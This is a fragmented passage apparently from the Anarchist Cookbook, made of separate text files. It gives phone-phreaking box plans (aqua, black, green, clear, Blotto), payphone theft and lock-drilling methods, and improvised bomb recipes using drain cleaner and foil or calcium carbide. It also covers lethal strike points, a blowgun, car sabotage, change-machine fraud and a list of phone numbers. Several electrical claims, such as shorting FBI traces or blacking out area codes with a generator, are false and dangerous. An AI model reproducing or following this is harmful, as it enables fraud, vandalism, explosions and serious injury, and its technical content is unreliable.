and question.  However, legally, they can do nothing beca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you did was answer your f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note&gt;:Almost all instructions are told to the person in command by Alli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rdings.  A lot of this tutorial is just a listing of th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s plus information gathered by either myself or the ph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itten by the Troop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qua Box Plans                                            by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rue phreaker lives in fear of the dreadded F.B.I. 'Lock In Tr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long time, it was impossible to escape from the Lock In Tr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box does offer an escape route with simple directions to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box is quite a simple concept, and almost any phreaker with bas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s knowledge can construct and us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ck In Tr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ock in trace is a device used by the F.B.I. to lock into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location so that he can not hang up while a trace is in prog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ose of you who are not familiar with the conecpt of 'locking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here's a brief desciption. The F.B.I. can tap into a convers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rt of like a three-way call connection. Then, when they get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 plug electricity into the phone line. All phone conne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held open by a certain voltage of electric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s why you sometimes get static and faint connections when you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ing far away, because the electricity has trouble keeping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What the lock in trace does is cut into the line and generate that s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tage straight into the lines. That way, when you try and hang up, volt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retained. Your phone will ring just like someone was calling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n after you hang up. (If you have call waiting, you should underst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ter about that, for call waiting intersepts the electricity and mak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one that means someone is going through your line. Then, it is a ma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which voltage is higher. When you push down the receiver,then it see-sa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lectricity to the other side. When you have a person on each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impossible to hang up unless one or both of them will hang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try to hang up, voltage is retained, and your phone will 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hould give you an understanding of how calling works. Also,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icity passes through a certain point on your phone, the electric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s a bell to ring, or on some newer phones an electronic ring to s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n order to eliminate the trace, you somehow must low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tage level on your phone line. You should know that every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one else picks up the phone line, then the voltage does decre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ittle. In the first steps of planning this out, Xerox suggested get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a hundred phones all hooked into the same line that could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taken off the hook at the same time. That would greatly decrea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tage level. That is also why most three-way connections that are u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ell service three way calling (which is only $3 a month) become qu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int after a while. By now, you should understand the basic idea.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to drain all of the power out of the line so the voltage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be kept up. Rather sudden draining of power could quickly short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B.I. voltage machine, because it was only built to sus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xact voltage nessecary to keep the voltage out. For now, imag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ne of the normal Radio Shack generators that you can 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ck up that one end of the cord that hooks into the central box ha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jack on it and the other has an electrical plug. This way,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flash" voltage through the line, but cannot drain it. So,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ifications have to be d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BEOC (Basic Electrical Output Socket), like a small lamp-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on, where you just have a simple plug and wire that would plu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a light bul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cords mentioned above, if you can't find one then construct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n... Same voltage connection, but the restrainor must be built in (I.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entral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phone jacks (one for the modem, one for if you are being trac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ug the aqua box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creativity and easy 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ice: No phones have to be destroyed/modified to make this box,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go out and buy a new phone for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right, this is a very simple procedure. If you have the BEOC, it c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 into anything: a radio, or whatever. The purpose of hav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s you are going to suck the voltage out from the phone line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lectrical appliance so there would be no voltage left to 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in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Take the connection cord. Examine the plug at the end. It should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two prongs. If it has three, still, do not fear. Make sur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ical appliance is turned off unless you wanna become a crispy cri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making this thing. Most plugs will have a hard plastic design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 of them to prevent you from getting in at the electrical wires in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remove it. If you want to keep the plug (I don't see wh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just cut the top off. When you look inside, Lo and Beh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ill see that at the base of the prongs there are a few wi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ng in. Those wires conduct the power into the appli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refully unwrap those from the sides and pull them out unt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are about an inch ahead of the prongs. If you don't wanna keep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ck, then just rip the prongs out. If you are, cover the prongs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ultation tape so they will not connect with the wires when the po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being drained from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Do the same thing with the prongs on the other plug, so you hav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res evenly connected. Now, wrap the end of the wires around each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ppen to have the other end of the voltage cord hooked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stop reading now, you're too fucking stupid to continue.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wrapped the wires around each other, then cover the whole thing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lugs with insulating tape. Then, if you built your own control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if you bought one, then cram all the wires into it and reclos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box is your ticket out of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Re-check everything to make sure it's all in place. This is a pret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imsy connection, but on later models when you get more experienced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then you can solder away at it and form the whole device into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 box, with some kind of cheap mattel hand-held game inside t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ower connector.  In order to use it, just keep this box han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ug it into the jack if you want, but it will slightly low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tage so it isn't connected. When you plug it in, if you see sp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plug it and restart the whole thing. But if it just seems fine then leav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so you have the whole thing plugged in and all... Do not use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the situation is desperate! When the trace has gone on, do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nic, unplug your phone, and turn on the appliance that it was hook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t will need energy to turn itself on, and here's a great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oltage to keep a phone line open is pretty small and a simple l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lb should drain it all in and probably short the F.B.I. computer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ame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ppy boxing and stay fre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ndenberg Bomb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ed:1 Ballo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Bo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Liquid Plum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Piece Aluminum Fo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Length F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the bottle 3/4 full with Liquid Plumr and add a little piec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foil to it. Put the balloon over the neck of the bottle unt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alloon is full of the resulting gas.  This is highly flamm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g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ie the baloon.  Now light the fuse, and let it ri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fuse contacts the balloon, watch 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Kill Someone==]------------[=WITH YOUR BARE H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 EXCERPT FROM THE ANARCHISTS COOKB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ile will explain the basics of hand-to-hand combat, and will t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best places to strike and kill an ene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engaged in hand-to-hand combat, your life is always at st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only one purpose in combat, and that is to kill your ene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face an enemy with the idea of knocking him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ances are extremely good that he will kill YOU inst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a weapon is not available, one must resort to the fu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of his natural weapons. The natural weapons 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he knife edge of your h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Fingers folded at the second joint or knuck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The protruding knuckle of your second fin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The heel of your h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Your bo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Elb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Kne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 and Tee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tacking is a primary factor. A fight was n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n by defensive action. Attack with all of your streng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any point or any situation, some vulnerable point on your enem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will be open for attack. Do this while screaming as screaming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purpo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o frighten and confuse your ene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To allow you to take a deep breath which, in turn, will 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xygen in your blood stream. Your balance and balance of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emy are two inportant factors; since, if you succeed in ma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enemy lose his balance, the chances are nin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that you can kill him in your next move. The best over-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nce is where your feet are spread about shoulders width ap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right foot about a foot ahead of the left. Both ar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be bent at the elbows parallel to each other. Stand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lls of your feet and bend your waist slightly. Kinda of lik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er's crouch. Employing a sudden movement or a scream or yell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w your enemy off-balance. There are many vulnerable point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ody. We will cover them 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yes:Use your fingers in a V-shape and attack in gouging mo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se:(Extremely vulnerable) Strike with the knife edge of the h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ong the bridge, which will cause breakage, sharp pain, tempor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lindness, and if the blow is hard enough, death. Also, deliver a b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heel of your hand in an upward motion, this¢will shov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ne up into the brain causing dea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am's Apple: This spot is usually pretty well protected, but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the chance, strike hard with the knife edge of your hand.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sever the wind-pipe, and then it's all over in a matter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u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mple: There is a large artery up here, and if you hit it h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it will cause death. If you manage to knock your enemy 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ck him in the temple, and he'll never get up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 of the Neck: A rabbit punch, or blow delivered to the bas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ck can easily break it, but to be safe, it is bett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e butt of a gun or some other heavy blunt obj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per lip: A large network of nerves are located. These nerv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trememly close to the skin. A sharp upward blow will cause extre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in, and unconciosn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rs: Coming up from behind an enemy and cupping the hands in a clapp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ion over the victims ears can kill him immediately. The vibr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sed from the clapping motion will burst his eardrums, and c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l bleeding in the br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in: A VERY vulnerable spot. If left open, get it with kn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 and he'll buckle over very fa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dneys: A large nerve that branches off to the spinal cord comes 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se to the skin at the kidneys. A direct blow with the knife ed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your hand can cause dea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many more ways to kill and injure an enemy, but these sh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 best for the average person. This is meant only as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not recommend that you use this for a simple High School Braw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ese methods only, in your opinion, if your life is in dan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one of these methods could very easily kill or cause permanent dam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omeone. One more word of caution, you should practice these mo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using them on a dummy, or a mock battle with a fri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actually hit him to practice, just work on accurac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Systems Tutorial III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ARTICLE WILL FOCUS PRIMARILY ON THE STANDARD WESTERN ELECTRIC SING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OT COIN TELEPHONE (AKA FORTRESS FONE) WHICH CAN BE DIVIDED INTO 3 TYP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IAL-TONE FIRST (DT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IN-FIRST (CF):  (IE, IT WANTS YOUR $ BEFORE YOU RECEIVE A DIAL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IAL POST-PAY SERVICE (PP):  YOU PAYAFTER THE PARTY ANSW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OSITING COINS (SLU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YOU HAVE DEPOSITED YOUR SLUG INTO A FORTRESS, IT IS SUBJECTED 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MUT OF TESTS. THE FIRST OBSTACAL FOR A SLUG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NETIC TRAP.  THIS WILL STOP ANY LIGHT-WEIGHT MAGNETIC SLUGS AND CO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T PASSES THIS, THE SLUG IS THEN CLASSIFIED AS A NICKEL, DIME,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RTER.  EACH SLUG IS THEN CHECKED FOR APPROPRIATE SIZE AND WEIGHT.  IF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S ARE PASSED, IT WILL THEN TRAVEL THROUGH A NICKEL, DIME, OR QUAR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NET AS APPROPRIATE.  THESE MAGNETS SET UP AN EDDY CURRENT EFFECT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S COINS OF THE APPROPRIATE CHARACTERISTICS TO SLOW DOWN SO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FOLLOW THE CORRECT TRAJECTORY.  IF ALL GOES WELL, THE COIN WILL FOLLOW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RECT PATH (SUCH AS BOUNCING OFF OF THE NICKEL ANVIL) WHERE IT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FULLY FALL INTO THE NARROW ACCEPTED COIN CHANN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ATHER ELABORATE TESTS THAT ARE PERFORMED AS THE COIN TRAVELS DOW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IN CHUTE WILL STOP MOST SLUGS AND OTHER UNDESIRABLE COINS, SUCH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NIES, WHICH MUST THEN BE RETRIEVED USING THE COIN RELEASE L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SLUG MIRACULOUSLY SURVIVES THE GAMUT, IT WILL THEN STRIK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ROPRIATE TOTALIZER ARM CAUSING A RATCHET WHEEL TO ROTATE ONCE FOR E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CENT INCREMENT (EG, A QUARTER WILL CAUSE IT TO ROTATE 5 TI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OTALIZER THEN CAUSES THE COIN SIGNAL OSCILLATOR TO READOUT A DU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QUENCY SIGNAL INDICATING THE VALUE DEPOSITED TO ACTS (A COMPUTER) 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SPS OPERATOR. THESE ARE THE SAME TONES USED BY PHREAKS IN THE INFAMOUS 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ES. FOR A QUARTER, 5 BEEP TON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PULSED AT 12-17 PULSES PER SECOND (PPS).  A DIME CAUSES 2 BEEP TONES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 8.5 PPS WHILE A NICKEL CAUSES ONE BEEP TONE AT 5 - 8.5 PPS.  A BEE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ISTS OF 2 TONES:  2200 + 1700 HZ. A RELAY IN THE FORTRESS CALLED THE "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Y" (YES, THERE IS ALSO AN 'A RELAY') PLACES A CAPACITOR ACROS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ECH CIRCUIT DURING TOTALIZER READOUT TO PREVENT THE "CUSTOMER"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RING THE RED BOX TONES. IN OLDER 3 SLOT PHONES:  ONE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50-1100 HZ) FOR A NICKEL, TWO BELLS FOR A DIME, AND ONE GONG (800 HZ) FOR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RTER ARE USED INSTEAD OF THE MODERN DUAL-FREQUENCY TO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SPS &amp; AC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FORTRESSES ARE CONNECTED TO THE CO OF THE AREA, ALL TRANSACTION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LED VIA THE TRAFFIC SERVICE POSITION SYSTEM (TSPS).  IN AREA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NOT HAVE ACTS, ALL CALLS THAT REQUIRE OPERATOR ASSISTANCE, SUCH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ING CARD AND COLLECT, ARE AUTOMATICALLY ROUTED TO A TSPS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ITION. IN AN EFFORT TO AUTOMATE FORT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A COMPUTER SYSTEM KNOWN AS AUTOMATED COIN TOLL SERVICE (ACTS)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N IMPLEMENTED IN MANY AREAS.  ACTS LISTENS TO THE RED BOX SIGNALS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ES AND TAKES APPROPRIATE ACTION.  IT IS ACTS WHICH SAYS, "TWO DOLLARS PLE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USE) PLEASE DEPOSIT TWO DOLLARS FOR THE NEXT TEN SECONDS" (AND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IATIONS). ALSO, IF YOU TALK FOR MORE THAN THREE MINUTES AND THEN HANG-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S WILL CALL BACK AND DEMAND YOUR MONEY.  ACTS IS ALSO RESPONSIBLE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MATED CALLING CARD SERVICE. ACTS ALSO PROVIDE TROUBLE DIAGNOSI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FTSPEOPLE (REPAIRMEN SPECIALIZING IN FORTRESSES).  FOR EXAMPLE, THERE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IN TEST WHICH IS GREAT FOR TUNING UP RED BOXES.  IN MANY AREAS THIS TEST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ACTIVATED BY DIALING 09591230 AT A FORTRESS (THANKS TO KARL MARX FOR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ONCE ACTIVATED IT WILL REQUEST THAT YOU DEPOSIT VARIOUS CO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ILL THEN IDENTIFY THE COIN AND OUTPULSE THE APPROPRIATE RED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  THE COINS ARE USUALLY RETURNED WHEN YOU HANG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AKE SURE THAT THERE IS ACTUALLY MONEY IN THE FONE, THE CO INITIATE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 TEST" AT VARIOUS TIMES TO DETERMINE IF A COIN IS ACTUALLY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E.  THIS IS WHY YOU MUST DEPOSIT AT LEAST A NICKEL IN ORDER TO USE A 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N BO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YING THE INITIAL RATE IN ORDER TO USE A RED BOX (ON CERTAIN FORTRE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 A SOUR TASTE IN MANY RED BOXER'S MOUTHS THUS THE GREEN BOX WAS INVEN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REEN BOX GENERATES USEFUL TONES SUCH AS COIN COLLECT, COIN RETUR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GBACK.  THESE ARE THE TONES THAT ACTS OR THE TSPS OPERATOR WOULD SEN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 WHEN APPROPRIATE. UNFORTUNATELY, THE GREEN BOX CANNOT BE USED A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TRESS STATION BUT IT MUST BE USED BY THE CALLED PAR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THE T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IN COLLECT       700 + 1100 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IN RETURN       1100 + 1700 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INGBACK           700 + 1700 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THE CALLED PARTY SENDS ANY OF THESE TONES, AN OPERATOR RELEA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 SHOULD BE SENT TO ALERT THE MF DETECTORS AT THE CO.  THIS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MPLISHED BY SENDING 900 + 1500 HZ OR A SINGLE 2600 HZ WINK (90 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ED BY A 60 MS GAP AND THEN THE APPROPRIATE SIGNAL FOR AT LEAST 900 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DO NOT FORGET THAT THE INITIAL RATE IS COLLECTED SHORTLY BEFORE THE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UTE PERIOD IS UP. INCIDENTALLY, ONCE THE ABOVE MF T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COLLECTING AND RETURNING COINS REACH THE CO, THEY ARE CONVERTED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APPROPRIATE DC PULSE (-130 VOLTS FOR RETURN &amp; +130 VOLTS FOR COLLECT).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SE IS THEN SENT DOWN THE TIP TO THE FORTRESS.  THIS CAUSES THE COIN RE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EITHER RETURN OR COLLECT THE COINS. THE ALLEGED "T-NETWORK" TAKES ADVANT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IS INFORMATION.  WHEN A PULSE FOR COIN COLLECT (+130 VDC) IS SENT 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NE, IT MUST BE GROUNDED SOMEWHERE.  THIS IS USUALLY EITH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LLOW OR BLACK WIRE.  THUS, IF THE WIRES ARE EXPOSED, THESE WIRES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T TO PREVENT THE PULSE FROM BEING GROUNDED.  WHEN THE THREE MIN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ITIAL PERIOD IS ALMOST UP, MAKE SURE THAT THE BLACK &amp; YELLOW WIR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RED; THEN HANG UP, WAIT ABOUT 15 SECONDS IN CASE OF A SECOND PU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NNECT THE WIRES, PICK UP THE FONE, HANG UP AGAIN, AND IF ALL GOES WELL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BE "JACKPOT"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YSICAL ATT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YPICAL FORTRESS WEIGHS ROUGHLY 50 LBS. WITH AN EMPTY COIN BOX.  MOS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ACCOUNTED FOR IN THE ARMOR PLATING.  WHY ALL THE SECURITY?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 CONTRIBUTES IT TO THE FOLLOWING: "SOCIAL CHANGES DURING THE 1960'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DE THE MULTISLOT COIN STATION A PRIME TARGET FOR:  VANDALISM, STRONG A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BBERY, FRAUD, AND THEFT OF SERVICE. THIS BROUGHT ABOUT THE INTRODUCTION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RE RUGGED SINGLE SLOT COIN  STATION AND A NEW ENVIRONMENT FOR CO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AS FOR PICKING THE LOCK, I WILL QUOTE MR. PHEL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OFTEN FANTASIZE ABOUT 'PICKING THE LOCK' OR 'GETTING A MA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WELL, YOU CAN FORGET ABOUT IT. I DON'T LIKE TO DISCOURAGE PEOPLE,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ILL SAVE YOU FROM WASTING ALOT OF OUR TIME--TIME WHICH CAN BE PU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TER USE (HEH, HEH)." AS FOR PHYSICAL ATTACK, THE COIN PL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SECURED ON ALL FOUR SIDE BY HARDENED STEEL BOLTS WHICH PASS THROUGH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OTS EACH.  THESE BOLTS ARE IN TURN INTERLOCKED BY THE MAIN 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PHREAK I KNOW DID MANAGE TO TAKE ONE OF THE 'MOTHERS' HOME (WHICH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ACHED TO A PIECE OF PLYWOOD AT A CONSTRUCTION SITE; OTHERWI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ANENT ONES ARE A BITCH TO DETACH FROM THE WALL!).  IT TOOK HIM ALM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N HOURS TO OPEN THE COIN BOX USING A POWER DRILL, SLEDGE HAMMERS, AND CR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RS (WHICH WAS EMPTY -- PERHAPS NEXT TIME, HE WILL DEPOSIT A COIN FIRS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R IF IT SLUSHES DOWN NICELY OR HITS THE EMPTY BOTTOM WITH A CLU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ING THE FONE OFFERS A HIGHER MARGIN OF SUCCESS.  ALTHOUGH THIS MAY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ICULT OFTEN REQUIRING BRUTE FORCE AND THERE HAS BEEN SEVERAL CASE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 AXLES BEING LOST TRYING TO TAKE DOWN A FONE!  A QUICK AND DIRTY WA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THE COIN BOX IS BY USING A SHOTGUN.  IN DETROIT, AFTER ECOLOG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NED OUT A MUNICIPAL POND, THEY FOUND 168 COIN PHONE RIF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COLDER AREAS, SUCH AS CANADA, SOME SHREWD PEOPLE TAPE UP THE FONES U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CT TAPE, POUR IN WATER, AND COME BACK THE NEXT DAY WHEN THE WATER WILL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ZE THUS EXPANDING AND CRACKING THE FONE OP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NE CASE, "UNAUTHORIZED COIN COLLECTORS" WHERE CAUGHT WHEN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OUGHT $6,000 IN CHANGE TO A BANK AND THE BANK BECAME SUSPICI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ANY RATE, THE MAIN LOCK IS AN EIGHT LEVEL TUMBLER LOCATED ON THE RIGHT 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COIN BOX.  THIS LOCK HAS 390,625 POSSIBLE POSITIONS (5 ^ 8, SINCE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8 TUMBLERS EACH WITH 5 POSSIBLE POSITIONS) THUS IT IS HIGHLY P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STANT!  THE LOCK IS HELD IN PLACE BY 4 SCREWS.  IF THERE IS SUFFICI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RANCE TO THE RIGHT OF THE FONE, IT IS CONCEIVABLE TO PUNCH OUT THE SCRE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THE DRILLING PATTERN BELOW (PROVIDED BY ALEXANDER MUNDY IN TAP #3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 3/16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gt;!!      1-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Z)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2-3/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Z) KEYHOLE   (+) SCRE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THIS IS ACCOMPLISHED, THE LOCK CAN BE PUSHED BACKWARDS DISENGAG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CK FROM THE COVER PLATE.  THE FOUR BOLTS OF THE COVER PLATE CAN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RETRACTED BY TURNING THE BOLTWORKS WITH A SIMPLE KEY IN THE SHAP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E ON THE COIN PLATE (SEE DIAGRAM BELOW).  OF COURSE, THERE ARE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S AND DRILLING PATTER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OUGH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GRAM OF COVER PLATE KEYH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OP COVER USES A SIMILAR (BUT NOT AS STRONG) LOCKING METHOD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HOLE DEPICTED ABOVE ON THE TOP LEFT HIDE AND A REGULAR LOCK (PROBAB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MBLER ALSO) ON THE TOP RIGHT-HAND SIDE. IT IS INTERESTING TO EXPERI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COIN SHUTE AND THE FORTRESSES OWN "RED BOX" (WHICH BELL DIDN'T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ALLS' TO COLOR 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SCELLANE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FEW AREAS (RURAL &amp; CANADA), POST-PAY SERVICE EXISTS.  WITH THIS TYP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THE MOUTHPIECE IS CUT OFF UNTIL THE CALLER DEPOSITS MONEY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LLED PARTY ANSWERS.  THIS ALSO ALLOWS FOR FREE CALLS TO WEATH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DIAL-IT SERVICES!  RECENTLY, 2600 MAGAZINE ANNOUNCED THE CLEAR BOX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ISTS OF A TELEPHONE PICKUP COIL AND A SMALL AMP.  IT IS BASED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CIPAL THAT THE RECEIVER IS ALSO A WEAK TRANSMITTER AND THAT BY AMPLIFY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SIGNAL YOU CAN TALK VIA THE TRANSMITTER THUS AVOIDING COS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CHARGES! MOST FORTRESSES ARE FOUND IN THE 9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UNDER FORMER BELL AREAS, THEY USUALLY START AT 98XX (RIGHT BELOW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XX OFFICIAL SERIES) AND MOVE DOWNW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THE LINE, NOT THE FONE, DETERMINES WHETHER OR NOT A DEPOS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T BE MADE, DTF &amp; CHARGE-A-CALL FONES MAKE GREAT EXTEN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ALLY, FORTRESS FONES ALLOW FOR A NEW HOBBY--INSTRUCTION PLATE COLLEC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AT IS REQUIRED IS A FLAT-HEAD SCREWDRIVER AND A PAIR OF NEEDLE-N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IERS.  SIMPLY USE THE SCREWDRIVER TO LIFT UNDERNEATH THE PLATE SO THAT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GRAB IT WITH THE PLIERS AND YANK DOWNWARDS. I WOULD SUGGEST COVER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PS OF THE PLIERS WITH ELECTRICAL TAPE TO PREVENT SCRATCHING.  TEN CENT PL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DEFINITELY BECOMING A "RAR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TRESS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A LONELY FORTRESS MAY SEEM THE PERFECT TARGET, BEWARE!  THE GESTAP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S BEEN KNOWN TO STAKE OUT FORTRESSES FOR AS LONG AS 6 YEARS ACCORDING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SS ROOTS QUARTERLY.  TO AVOID ANY PROBLEMS, DO NOT USE THE SAME F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EATEDLY FOR BOXING, CALLING CARDS, &amp; OTHER EXPERIMENTS.  THE TELCO KNOWS H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CH MONEY SHOULD BE IN THE COIN BOX AND WHEN ITS NOT THERE THEY TEND TO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TURBED (READ:  PISSED O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 This was originally written back in my old Apple ][ d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nce the upper case. I just did not think I should wast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tle time I have to work on this shit converting it to lo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se. Hell, I thought 80-columns was pretty nice of me.. heh he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enjoy this and the rest of this Cookbook! ---------J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Box Pla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any given time, the voltage running through your phone is about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ts. When someone calls you, this voltage goes up to 48 Volts and r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ell. When you answer, the voltage goes down to about 10 Vol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one company pays attention to this. When the voltage drops to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start billing the person who called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lack Box keeps the voltage going through your phone at 36 Vol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at it never reaches 10 Volts. The phone company is thus foo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thinking you never answered the phone and does not bill the call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 after about a half hour the phone company will get suspici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disconnect your line for about 10 seco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1.8K 1/2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1.5V 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SPST Swi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Open your phone by loosening the two screws on the botto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ing the case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There should be three wires: Red, Green, and Yellow. We'll be wor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Red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Connect the following in parall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The Resistor and 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The SPST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ther words, you should end up with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d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 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    = SP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PST Switch is the On/Off Switch of the Black Box. When the box is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phone behaves normally. When the box is on and your phone r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ED flashes. When you answer, the LED stays on and the volt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kept at 36V, so the calling party doesn't get charged. When th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on, you will not get a dial tone and thus cannot make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remember that calls are limited to half an hou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 Due to new Fone Company switching systems &amp; the like,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 or may not work in your area. If you live in bumfuck Kentuck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try this out. I make no guarantees! (I never do...) ----J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famous Blotto Box!!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bet that NOONE has the balls to build this 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ally, it is here! What was first conceived as a joke to fool the innoc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ers around America has finally been concei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for you people who are unenlightened about the Blotto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is a brief summery of a lege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The Blotto Box &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years now every pirate has dreamed of the Blotto Box. It was at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de as a joke to mock more ignorant people into thinking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unction of it actually was possible. Well, if you are The Volt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 it is possible. Originally conceived by King Blotto of much f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lotto Box is finally available to the publ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Jolly Roger can not be responsible for the information disclo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file! This file is strictly for informational purpose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not be actually built and used! Usage of this electronical impu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could have the severe results listed below and could result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 federal prosecution! Again, I TAKE NO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right, now that that is cleared up, here is the basis of th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lotto Box is every phreaks dream... you could hold AT&amp;T down on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e's with this device. Because, quite simply, it can turn off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s everywhere. Nothing. Blotto. No calls will be allowed out of an are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 and no calls will be allowed in. No calls can be made inside it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matter. As long as the switching system stays the same, this box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stop at a mere area code. It will stop at nothing. The electri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ulses that emit from this box will open every line. Every line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g and ring and ring... the voltage will never be cut off unti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generator is stopped. This is no 200 volt job,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talking GENERATOR. Every phone line will continue to ring, and peo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se to the box may be electricuted if they pick up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Blotto Box can be stopped by merely cutting of the line or gen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y are cut off then nothing will emit any longer. It will t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while for the box to calm back down again, but that is merely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erficial aftereffect. Once again: Construction and use of this box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advised! The Blotto Box will continue as long as ther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icity to continue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 that is what it does, now, here are some interesting things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o with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Blotto Functions/Installin'&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you have installed your Blotto, there is no turning back.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ing are the instructions for construction and use of this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read and heed all warnings in the above section before you atte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onstruct this bo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A Honda portable generator or a main power outlet like in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dium or some such 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400 volt rated coupler that splices a female plug in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ne line j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 meter of voltage to attach to the box it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 green base (i.e. one of the nice boxes about 3' by 4'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see around in your neighborhood. They are the main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ards and would be a more effective line to start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A regular phone jack (not your own, and not in your are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 soldering iron and much sol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 remote control or long wooden p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 must have guessed the construction from that. If not, here g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explain in detail. Take the Honda Portable Generator and all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ther listed equiptment and go out and hunt for a green base. M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e it is one on the ground or hanging at head level from a p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the huge ones at the top of telephone poles. Open it up with an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ienent, if you are two feeble that fuck don't try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look inside... you are hunting for color-coordinating line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n and red. Now, take out your radio shack cord and rip the meter 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 Replace it with the voltage meter about. A good level to se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tage to is about 1000 volts. Now, attach the voltage meter to the c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et the limit for one thousand. Plug the other end of the c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the generator. Take the phone jack and splice the jack part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it up and match the red and green wires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ther red and green wires. NOTE: If you just had the generator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ave done this in the correct order, you will be a crispy cri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ep the generator off until you plan to start it up. Now, solder th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s together carefully. Wrap duck tape or insultation tape around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wires. Now, place the remote control right on to the start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generator. If you have the long pole, make sure it is very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tand back as far away as you can get and reach the pole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ICE: If you are going right along with this without reading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you still realize now that your area code is about to bec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ll! Then, getting back, twitch the pole/remote control and run for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mn life. Anywhere, just get away from it. It will be genera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much electricity that if you stand to close you will kill your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enerator will smoke, etc. but will not stop. You are now killing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code, because all of that energy is spreading through all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lines around you in every dir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a nice d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The Blotto Box: Aftermath&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hat is the plans for the most devastating and ultimately dead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 ever created. My hat goes off to: King Blotto (for the original id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gun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article I shall attempt to explain the use and manufac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powerfull blow-gun and making darts for the gun.The possesion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low gun described in this article IS a felo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be carefull where you use it. I don't want to get you all bus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Several strands of yarn (About 2 inches a-pie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 regular penc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A 2 1/4 inch long needle (hopefully with a beaded head. If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btainable,wrap tape around end of nee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2-3 1/4 foot pipe. (PVC or Aluminum) Half a inch in diame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tructing the d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st- Carefully twist and pull the metal part (Along with eras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pencil till it comes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nd- Take Pin and start putting about 5-7 Strands of yarn on the pin.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sh them up to the top of the pin. But not over the head of the pin (orthe t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rd- Push pin through the hollow part of the head where the pencil was b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th- That should for a nice looking dart. (see illust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t;&gt;&gt;&gt;-----/    #  is the ya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is the head of the penc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s the pin it-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s the head of the p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the Da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st- Now take the finished dart and insert it in the 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t is too small put on more ya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nd- Aim the tube at a door, wall, sister, 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rd- blow on the end of the pi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th- Sometimes the end of the pipe may be sharp. When this happens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ggest you wrap it with some black electrician tape.It should fe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ot b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own Box Pla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 fairly simple mod that can be made to any phone. All it do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allow you to take any two lines in your house and create a par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So far I have not heard of anyone who has any probl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 There is one thing that you will notice when you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 two people who is called by a person with a brown box. The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rson will sound a little bit faint. I could overcome this with s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ifiers but then there wouldn't be very many of these made [Why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the convenience of having two people on the line at once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up for any minor volume lo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is the dia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PART               | SYMB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LACK WIR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YELLOW WIR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RED WIR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GREEN WIR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SPDT SWITCH         |  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VERTICAL WIR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HORIZONTAL WIRE     |   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PHONE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um Carbide Bomb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EXTREMELY DANGEROUS. Exercise extreme caution.... Obtain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um carbide. This is the stuff that is used in carbide lamp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be found at nearly any hardware store. Take a few pieces of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uff (it looks like gravel) and put it in a glass jar with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Put a lid on tightly. The carbide will react with the wat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duce acetylene carbonate which is similar to the gas us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tting torches. Eventually the glass with explode from inter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sure. If you leave a burning rag nearby, you will get a n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b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Ways to Send a Car to Hell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e to a lot of compliments, I have written an update to file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left the original intact. This expands upon the origin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a, and could be well called a sequal. -----J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have phun with someone else's car.  If you really det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one, and I mean detest, here's a few tips on what to do in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re time.  Move the windshield wiper blades, and insert and g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cks.  The tacks make lovely designs.  If your "friend" goe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hool with you, Just before he comes out of school.  Light a ligh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put it directly underneath his car door han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Leave...Listen.  When you hear a loud "shit!", you know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de it to his car in time.  Remove his muffler and pour approxima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Cup of gas in it. Put the muffler back, then wait till their car sta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you have a cigarette lighter.  A 30 foot long cigarette ligh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ne is effective, and any fool can do it.  Remove the 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 filter. That's it!  Or a oldie but goodie: sugar in the gas ta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uff rags soaked in gas up the exhaust pipe.  Then you wonder wh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friend" has trouble with his/her lungs.  Here's one that tak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and many friends.  Take his/her car then break into their h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reassemble it, in their living or bedroom.  Phun eh?  If yo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engines, say eeni mine moe and point to something and remov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onder why something doesn't work. There are so many others,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al good juicy ones come by thinking h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pping off Change Machine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you ever seen one of those really big changer machines in airpo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undrymats or arcades that dispense change when you put in your 1 or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llar bill?  Well then, here is an article for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Find the type of change machine that you slide in your bill leng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se, not the type where you put the bill in a tray and then slid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y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fter finding the right machine, get a $1 or $5 bill.  Start crump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into a ball.  Then smooth out the bill, now it should have a very wrink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Now the hard part.  You must tear a notch in the bill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 side about 1/2 inch below the little 1 dollar symbol (See Fig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If you have done all of this right then take the bill and go o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Put the bill in the machine and wait.  What should happen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put your bill in the machine it thinks everything is f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t gets to the part of the bill with the notch cut o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will reject the bill and (if you have done it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you the change at the same time!!! So, you end up getting your b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 plus the change!!  It might take a little practice, but o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get the hang of it, you can get a lot of mon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         /-------\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Pic.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  /\     \-------/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notch here. About 1/2 " down from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 Sorry for the "text work" but you should be able to get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a. Have fun!!!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r Box Pla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lear box is a new device which has just been invented that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hroughout Canada and rural United States. The clear box work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tPay" payphones (fortress fones). Those are the payph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don't require payment until after the connection is establish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pick up the fone, get a dial tone, dial your number, and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ert your money after the person answ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don't deposit the money then you can not speak to the person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ther end because your mouth piece is cut off but not the ear-pie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bviously these phones are nice for free calls to weather or time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such recordings). All you must do is to go to your nearby Radi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ck, or electronics store, and get a four-transistor amplifier an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suction cup induction pick-up. The induction pick-up w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oked up as it normally would to record a conversation, exce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t would be plugged into the output of the amplifier an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phone would be hooked to the input. So when the par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s being called answers, the caller could speak through the li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phone instead. His voice then goes through the amplifier and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duction coil, and into the back of the receiver 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ould then be broadcast through the phone lines and the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ywould be able to hear the caller. The Clear Box th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rs up' the problem of not being heard. Luckily, the line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be cut-off after a certain amount of time because it will wa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ever for the coins to be put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iggest advantage for all of us about this new clear box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ct that this type of payphone will most likely become very comm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e to a few things: 1st, it is a cheap way of getting the DT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tone-first service, 2nd, it doesn't require any special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phone company) This payphone will work on any phon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ually a payphone line is different, but this is a regular phon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is set up so the phone does all the charging, not the compan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NA List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PA  TEL NO          NPA  TEL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1  201-676-7070    601  601-961-813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2  304-343-7016    602  303-293-877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3  203-789-6815    603  617-787-53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4  204-949-0900    604  604-432-299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5  205-988-7000    605  402-580-22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6  206-382-5124    606  502-583-286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7  617-787-5300    607  518-471-81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8  303-293-8777    608  608-252-693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9  415-543-2861    609  201-676-707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2  518-471-8111    612  402-580-22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  415-781-5271    613  416-443-054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4  214-464-7400    614  614-464-012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5  412-633-5600    615  615-373-579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6  614-464-0123    616  313-223-869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7  217-525-5800    617  617-787-53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8  402-580-2255    618  217-525-58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9  317-265-4834    619  818-501-725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1  304-343-1401    701  402-580-22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2  412-633-5600    702  415-543-286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3  303-293-8777    703  304-344-793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4  304-344-8041    704  912-784-04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5  912-784-0440    705  416-979-346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6  306-347-2878    706  ***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7  303-293-8777    707  415-543-637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8  402-580-2255    709  ***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9  217-525-5800    712  402-580-22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2  312-796-9600    713  713-861-719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3  313-223-8690    714  818-501-725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4  314-721-6626    715  608-252-693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5  518-471-8111    716  518-471-81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6  816-275-2782    717  412-633-56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7  317-265-4834    718  518-471-81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8  504-245-5330    801  303-293-877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9  402-580-2255    802  617-787-53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1  617-787-5300    803  912-784-04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2  402-580-2255    804  